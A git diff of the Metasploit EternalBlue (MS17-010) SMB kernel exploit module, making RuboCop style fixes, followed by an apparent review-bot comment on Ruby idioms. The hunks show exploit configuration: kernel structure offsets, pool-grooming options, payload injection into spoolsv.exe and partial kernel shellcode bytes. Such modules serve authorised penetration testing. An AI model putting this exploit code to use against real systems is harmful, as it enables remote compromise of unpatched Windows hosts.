Stop some of the rubocop carnage
parent
5ec155fd44
commit
4f2ba46125
|
@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
|
'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',
|
||||||
'Description' => %q{
|
'Description' => %q(
|
||||||
This module is a port of the Equation Group ETERNALBLUE exploit, part of
|
This module is a port of the Equation Group ETERNALBLUE exploit, part of
|
||||||
the FuzzBunch toolkit released by Shadow Brokers.
|
the FuzzBunch toolkit released by Shadow Brokers.
|
||||||
|
|
||||||
|
@ -35,9 +35,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
|
|
||||||
On some systems, this module may cause system instability and crashes, such as a BSOD or
|
On some systems, this module may cause system instability and crashes, such as a BSOD or
|
||||||
a reboot. This may be more likely with some payloads.
|
a reboot. This may be more likely with some payloads.
|
||||||
},
|
),
|
||||||
|
|
||||||
'Author' => [
|
'Author' =>
|
||||||
|
[
|
||||||
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
|
'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0
|
||||||
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
|
'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius
|
||||||
'Equation Group',
|
'Equation Group',
|
||||||
|
@ -59,29 +60,29 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DefaultOptions' =>
|
'DefaultOptions' =>
|
||||||
{
|
{
|
||||||
'EXITFUNC' => 'thread',
|
'EXITFUNC' => 'thread',
|
||||||
'WfsDelay' => 5,
|
'WfsDelay' => 5
|
||||||
},
|
},
|
||||||
'Privileged' => true,
|
'Privileged' => true,
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'Space' => 2000, # this can be more, needs to be recalculated
|
'Space' => 2000, # this can be more, needs to be recalculated
|
||||||
'EncoderType' => Msf::Encoder::Type::Raw,
|
'EncoderType' => Msf::Encoder::Type::Raw
|
||||||
},
|
},
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
[
|
[
|
||||||
[ 'Windows 7 and Server 2008 R2 (x64) All Service Packs',
|
[
|
||||||
|
'Windows 7 and Server 2008 R2 (x64) All Service Packs',
|
||||||
{
|
{
|
||||||
'Platform' => 'win',
|
'Platform' => 'win',
|
||||||
'Arch' => [ARCH_X64],
|
'Arch' => [ARCH_X64],
|
||||||
|
|
||||||
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
|
'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],
|
||||||
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
|
'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset
|
||||||
'et_alertable' => 0x4c, # ETHREAD.Alertable offset
|
'et_alertable' => 0x4c, # ETHREAD.Alertable offset
|
||||||
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
|
'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset
|
||||||
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
|
'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset
|
||||||
}
|
}
|
||||||
],
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 0,
|
'DefaultTarget' => 0,
|
||||||
'DisclosureDate' => 'Mar 14 2017',
|
'DisclosureDate' => 'Mar 14 2017',
|
||||||
|
@ -98,15 +99,17 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
|
OptBool.new('VERIFY_ARCH', [true, "Check if remote architecture matches exploit Target.", true]),
|
||||||
OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
|
OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),
|
||||||
OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
|
OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),
|
||||||
OptString.new('SMBDomain', [ false, '(Optional) The Windows domain to use for authentication', '.']),
|
OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
register_advanced_options(
|
register_advanced_options(
|
||||||
[
|
[
|
||||||
OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
|
OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),
|
||||||
OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
|
OptInt.new('MaxExploitAttempts', [true, "The number of times to retry the exploit.", 3]),
|
||||||
OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
|
OptInt.new('GroomAllocations', [true, "Initial number of times to groom the kernel pool.", 12]),
|
||||||
OptInt.new( 'GroomDelta', [ true, "The amount to increase the groom count by per try.", 5 ] ),
|
OptInt.new('GroomDelta', [true, "The amount to increase the groom count by per try.", 5])
|
||||||
])
|
]
|
||||||
|
)
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -118,9 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
def exploit
|
def exploit
|
||||||
begin
|
begin
|
||||||
for i in 1..datastore['MaxExploitAttempts']
|
for i in 1..datastore['MaxExploitAttempts']
|
||||||
|
|
||||||
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
|
grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)
|
||||||
|
|
||||||
smb_eternalblue(datastore['ProcessName'], grooms)
|
smb_eternalblue(datastore['ProcessName'], grooms)
|
||||||
|
|
||||||
# we don't need this sleep, and need to find a way to remove it
|
# we don't need this sleep, and need to find a way to remove it
|
||||||
|
@ -605,7 +606,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
|
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
def make_kernel_shellcode(proc_name)
|
def make_kernel_shellcode(proc_name)
|
||||||
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
|
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm
|
||||||
# Length: 1019 bytes
|
# Length: 1019 bytes
|
||||||
|
@ -675,7 +675,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
|
"\xFF\x31\xC9\x51\x51\x51\x51\x41\x59\x4C\x8D\x05\x1A\x00\x00\x00" +
|
||||||
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
|
"\x5A\x48\x83\xEC\x20\x41\xBB\x46\x45\x1B\x22\xE8\x68\xFF\xFF\xFF" +
|
||||||
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
|
"\x48\x89\xEC\x5D\x41\x5F\x5E\xC3"#\x01\x00\xC3"
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
# Sets common SMB1 Header values used by the various
|
# Sets common SMB1 Header values used by the various
|
||||||
|
@ -691,7 +690,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
packet
|
packet
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
# Returns the value to be passed to SMB clients for
|
# Returns the value to be passed to SMB clients for
|
||||||
# the password. If the user has not supplied a password
|
# the password. If the user has not supplied a password
|
||||||
# it returns an empty string to trigger an anonymous
|
# it returns an empty string to trigger an anonymous
|
||||||
|
|
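Review bot: The `for i in 1..datastore['MaxExploitAttempts']` loop in the `exploit` hunk (old line 118) is left untouched even though the commit is a RuboCop cleanup; `for` leaks `i` into the method's scope and RuboCop's Style/For flags it, so `1.upto(datastore['MaxExploitAttempts']) do |i|` with the matching `end` is the idiomatic replacement and leaves the `grooms` arithmetic unchanged. The body of `exploit` continues past the hunk, so the pairing of the surrounding `begin` with its `end`/`rescue` is not visible here. In the `make_kernel_shellcode` hunk the last byte literal carries a fused fragment `#\x01\x00\xC3"`, which Ruby lexes as a comment after the closing quote, so those bytes are not emitted; if that is intentional, a spaced `# ` comment saying why would make it obvious, otherwise the fragment should be deleted so the `# Length: 1019 bytes` note above it can be trusted. The `%q{` to `%q(` delimiter change in the first hunk is safe only if the description text between the first two hunks contains no unbalanced parenthesis, which cannot be confirmed from what is shown.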